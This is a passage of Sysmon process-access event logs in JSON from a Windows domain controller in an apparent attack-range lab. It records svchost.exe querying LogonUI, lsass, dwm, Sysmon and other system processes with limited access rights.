{"EventTime":"2020-08-01 05:54:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5859,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:30.535\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010C0A90000}\r\nSourceProcessId: 996\r\nSourceThreadId: 4500\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010BCB40000}\r\nTargetProcessId: 1100\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:30.535","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010C0A90000}","SourceProcessId":"996","SourceThreadId":"4500","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010BCB40000}","TargetProcessId":"1100","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5860,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:30.535\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010C0A90000}\r\nSourceProcessId: 996\r\nSourceThreadId: 4500\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-00105AD40000}\r\nTargetProcessId: 1376\r\nTargetImage: C:\\Windows\\system32\\dwm.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:30.535","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010C0A90000}","SourceProcessId":"996","SourceThreadId":"4500","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-00105AD40000}","TargetProcessId":"1376","TargetImage":"C:\\Windows\\system32\\dwm.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5861,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:30.535\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010C0A90000}\r\nSourceProcessId: 996\r\nSourceThreadId: 4500\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010BCB40000}\r\nTargetProcessId: 1100\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:30.535","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010C0A90000}","SourceProcessId":"996","SourceThreadId":"4500","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010BCB40000}","TargetProcessId":"1100","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5862,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:30.535\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010C0A90000}\r\nSourceProcessId: 996\r\nSourceThreadId: 4500\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010BCB40000}\r\nTargetProcessId: 1100\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:30.535","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010C0A90000}","SourceProcessId":"996","SourceThreadId":"4500","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010BCB40000}","TargetProcessId":"1100","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5863,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:30.535\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010C0A90000}\r\nSourceProcessId: 996\r\nSourceThreadId: 4500\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:30.535","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010C0A90000}","SourceProcessId":"996","SourceThreadId":"4500","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5864,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:30.535\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010C0A90000}\r\nSourceProcessId: 996\r\nSourceThreadId: 4500\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010A4F00000}\r\nTargetProcessId: 1592\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:30.535","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010C0A90000}","SourceProcessId":"996","SourceThreadId":"4500","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010A4F00000}","TargetProcessId":"1592","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5865,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:30.535\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010C0A90000}\r\nSourceProcessId: 996\r\nSourceThreadId: 4500\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:30.535","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010C0A90000}","SourceProcessId":"996","SourceThreadId":"4500","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5866,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:30.535\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010C0A90000}\r\nSourceProcessId: 996\r\nSourceThreadId: 4500\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:30.535","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010C0A90000}","SourceProcessId":"996","SourceThreadId":"4500","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5867,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:30.535\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010C0A90000}\r\nSourceProcessId: 996\r\nSourceThreadId: 4500\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:30.535","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010C0A90000}","SourceProcessId":"996","SourceThreadId":"4500","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5868,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:30.535\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010C0A90000}\r\nSourceProcessId: 996\r\nSourceThreadId: 4500\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010A7CD0200}\r\nTargetProcessId: 3244\r\nTargetImage: C:\\Windows\\system32\\wbem\\unsecapp.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:30.535","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010C0A90000}","SourceProcessId":"996","SourceThreadId":"4500","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010A7CD0200}","TargetProcessId":"3244","TargetImage":"C:\\Windows\\system32\\wbem\\unsecapp.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5869,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:30.535\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010C0A90000}\r\nSourceProcessId: 996\r\nSourceThreadId: 4500\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:30.535","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010C0A90000}","SourceProcessId":"996","SourceThreadId":"4500","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5870,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:30.535\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010C0A90000}\r\nSourceProcessId: 996\r\nSourceThreadId: 4500\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010ECBA0200}\r\nTargetProcessId: 2640\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 